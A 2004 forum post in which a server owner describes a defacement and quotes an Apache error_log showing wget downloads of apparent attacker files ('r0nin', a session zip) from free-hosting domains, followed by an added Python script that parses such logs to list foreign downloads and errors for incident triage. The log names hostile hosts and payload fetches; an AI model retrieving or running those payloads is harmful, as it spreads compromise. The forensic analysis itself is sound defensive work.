Dear Experts,
My Linux server has been hacked by a hacker.
He replaced all my clients' index pages, including those in sub-folders.
(It seems he can also use my server to scan other people's ports; it generated abnormal traffic and brought my rack down.)
I am using RedHat 9.0 / Fedora Core 2, Apache 1.3.33, PHP 4.3.9.
I haven't added any firewall rules, and my installation is the default installation.
Does anyone know how he hacked me?
It seems he hacked me using the www user; I checked the error_log:
--------------------------
--06:32:34--  http://uhuuhuhu.100free.com/sess_ffafce69943afd6b8d88aa4dbba790d3.zip => `sess_ffafce69943afd6b8d88aa4dbba790d3.zip'
Resolving uhuuhuhu.100free.com... 64.156.241.133
Connecting to uhuuhuhu.100free.com[64.156.241.133]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,261 [application/zip]
0K .......... ........ 100% 33.41 KB/s
06:32:37 (33.41 KB/s) - `sess_ffafce69943afd6b8d88aa4dbba790d3.zip' saved [19261/19261]
[Tue Dec 14 08:57:37 2004] [notice] SIGHUP received. Attempting to restart
PHP Warning: Unknown(): Unable to load dynamic library './php_gd.dll' - ./php_gd.dll: cannot open shared object file: No such file or directory in Unknown on line 0
[Tue Dec 14 08:57:38 2004] [notice] Apache/1.3.33 (Unix) PHP/4.3.9 configured -- resuming normal operations
[Tue Dec 14 08:57:38 2004] [notice] suEXEC mechanism enabled (wrapper: /usr/local/apache/bin/suexec)
[Tue Dec 14 08:57:38 2004] [notice] Accept mutex: sysvsem (Default: sysvsem)
[Tue Dec 14 08:59:46 2004] [notice] caught SIGTERM, shutting down
chetcpasswd.cgi: Operation not permitted
chetcpasswd.cgi: Operation not permitted
--19:30:56--  http://massxpl.gratishost.com/r0nin => `r0nin'
Resolving massxpl.gratishost.com... done.
Connecting to massxpl.gratishost.com[66.115.176.86]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,242 [text/plain]
0K .......... ........ 100% 25.88 KB/s
19:30:58 (25.88 KB/s) - `r0nin' saved [19242/19242]
--19:30:58--  http://massxpl.gratishost.com/r0nin => `r0nin.1'
Resolving massxpl.gratishost.com... done.
Connecting to massxpl.gratishost.com[66.115.176.86]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,242 [text/plain]
0K .......... ........ 100% 40.32 KB/s
19:30:59 (40.32 KB/s) - `r0nin.1' saved [19242/19242]
bind: Address already in use
--------------------------
Does anyone know how I can prevent him from hacking me again?
Thank you.
Stanley
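The log in the post above is notable for what does not belong in an Apache error_log: wget's progress output and bare shell errors such as "bind: Address already in use". Apache writes its own lines with a "[date] [level]" prefix; anything else landed there because a program spawned under the web server (via a CGI or PHP script) inherited httpd's stderr. As an added example that is not part of the original post or of any reply to it, the following Python script separates Apache-formatted lines from that foreign stderr, reconstructs each wget download (timestamp, URL, local file name, remote IP, byte count) and collects the stray errors, so a reader can quickly list what was fetched and from where. The embedded sample log is constructed to mirror the post's excerpt with the wrapped lines re-joined (one download is written in wget's two-line form to show the parser handles it); it is not a real log file, and all function and constant names are my own.

```python
import re
from dataclasses import dataclass

# Constructed sample, modelled on the error_log excerpt in the post above with the
# wrapped lines re-joined. It is not a verbatim copy of any real log file.
SAMPLE_ERROR_LOG = """\
--06:32:34--  http://uhuuhuhu.100free.com/sess_ffafce69943afd6b8d88aa4dbba790d3.zip => `sess_ffafce69943afd6b8d88aa4dbba790d3.zip'
Resolving uhuuhuhu.100free.com... 64.156.241.133
Connecting to uhuuhuhu.100free.com[64.156.241.133]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,261 [application/zip]
06:32:37 (33.41 KB/s) - `sess_ffafce69943afd6b8d88aa4dbba790d3.zip' saved [19261/19261]
[Tue Dec 14 08:57:37 2004] [notice] SIGHUP received.  Attempting to restart
PHP Warning:  Unknown(): Unable to load dynamic library './php_gd.dll' in Unknown on line 0
[Tue Dec 14 08:57:38 2004] [notice] Apache/1.3.33 (Unix) PHP/4.3.9 configured -- resuming normal operations
[Tue Dec 14 08:59:46 2004] [notice] caught SIGTERM, shutting down
chetcpasswd.cgi: Operation not permitted
chetcpasswd.cgi: Operation not permitted
--19:30:56--  http://massxpl.gratishost.com/r0nin => `r0nin'
Resolving massxpl.gratishost.com... done.
Connecting to massxpl.gratishost.com[66.115.176.86]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,242 [text/plain]
19:30:58 (25.88 KB/s) - `r0nin' saved [19242/19242]
--19:30:58--  http://massxpl.gratishost.com/r0nin
           => `r0nin.1'
Connecting to massxpl.gratishost.com[66.115.176.86]:80... connected.
19:30:59 (40.32 KB/s) - `r0nin.1' saved [19242/19242]
bind: Address already in use
"""

# Lines Apache itself writes ("[Tue Dec 14 08:57:37 2004] [notice] ...") and PHP's own messages.
APACHE_LINE = re.compile(
    r"^\[[A-Z][a-z]{2} [A-Z][a-z]{2} [ \d]\d \d{2}:\d{2}:\d{2} \d{4}\] "
    r"\[(?:emerg|alert|crit|error|warn|notice|info|debug)\]")
PHP_LINE = re.compile(r"^PHP (?:Warning|Notice|Fatal error|Parse error):")

# wget 1.x progress output; the "=> `file'" part is on the same line or on the next one.
WGET_START = re.compile(r"^--(\d{2}:\d{2}:\d{2})--\s+(\S+?)(?:\s+=>\s+`([^']+)')?$")
WGET_TARGET = re.compile(r"^\s*=>\s+`([^']+)'$")
WGET_CONNECT = re.compile(r"^Connecting to (\S+?)\[([\d.]+)\]:(\d+)")
WGET_SAVED = re.compile(r"^(\d{2}:\d{2}:\d{2}) \([^)]*\) - `([^']+)' saved \[(\d+)/(\d+)\]")
# Bare stderr from a program spawned under the web server, e.g. "bind: Address already in use".
STDERR_ERR = re.compile(r"^(\S+): (Operation not permitted|Address already in use|Permission denied)$")


@dataclass
class Download:
    started: str          # HH:MM:SS from the wget banner line
    url: str
    local_file: str = ""
    remote_ip: str = ""
    size: int = -1        # bytes reported in the "saved [n/m]" line
    completed: bool = False


def is_apache_line(line: str) -> bool:
    """True for lines httpd or PHP wrote themselves; anything else is foreign stderr."""
    return bool(APACHE_LINE.match(line) or PHP_LINE.match(line))


def triage_error_log(text: str) -> dict:
    """Split an error_log into Apache's own lines and foreign stderr, then
    reconstruct wget downloads and stray errors from the foreign part."""
    downloads, errors, foreign = [], [], []
    current = None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line or is_apache_line(line):
            continue
        foreign.append(line)
        if m := WGET_START.match(line):
            current = Download(started=m.group(1), url=m.group(2), local_file=m.group(3) or "")
            downloads.append(current)
        elif (m := WGET_TARGET.match(line)) and current and not current.local_file:
            current.local_file = m.group(1)          # two-line wget form
        elif (m := WGET_CONNECT.match(line)) and current:
            current.remote_ip = m.group(2)
        elif m := WGET_SAVED.match(line):
            # match the "saved" line to its download by file name, else the most recent one
            target = next((d for d in reversed(downloads) if d.local_file == m.group(2)), current)
            if target:
                target.size = int(m.group(3))
                target.completed = m.group(3) == m.group(4)
        elif m := STDERR_ERR.match(line):
            errors.append((m.group(1), m.group(2)))
    return {"downloads": downloads, "errors": errors, "foreign_lines": len(foreign)}


def report(result: dict) -> list:
    """Human-readable summary lines for the triage result."""
    lines = [f"{result['foreign_lines']} line(s) not written by Apache/PHP (foreign stderr)"]
    for d in result["downloads"]:
        state = "complete" if d.completed else "incomplete"
        lines.append(f"{d.started} fetched {d.url} from {d.remote_ip or '?'} -> {d.local_file} ({d.size} bytes, {state})")
    for prog, err in result["errors"]:
        lines.append(f"stray error from '{prog}': {err}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(triage_error_log(SAMPLE_ERROR_LOG))))
```

Run it against a real error_log by replacing SAMPLE_ERROR_LOG with the file's contents. Every URL and remote IP it prints is an indicator to block and to search for in the access_log of the same period, which is where the request that triggered the download (the exploited script and the source address) should be found.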